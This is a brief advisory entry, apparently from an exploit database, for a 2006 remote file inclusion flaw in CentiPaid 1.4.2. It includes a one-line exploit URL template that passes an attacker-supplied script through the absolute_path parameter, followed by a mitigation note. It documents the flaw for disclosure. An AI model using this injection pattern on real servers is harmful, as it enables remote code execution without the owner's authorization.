vendor:
CentiPaid
by:
Kw3[R]Ln
N/A
CVSS
N/A
Remote File Include Vulnerability
CWE
Product Name: CentiPaid
Affected Version From: 1.4.2002
Affected Version To: 1.4.2002
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2006
CentiPaid <= 1.4.2 [absolute_path] Remote File Include Vulnerability
Variable $absolute_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. Exploit URL: http://www.site.com/[path]/centipaid_class.php?absolute_path=[Evil_Script]
Mitigation:
Sanitize the variable $absolute_path to prevent remote file inclusion attacks.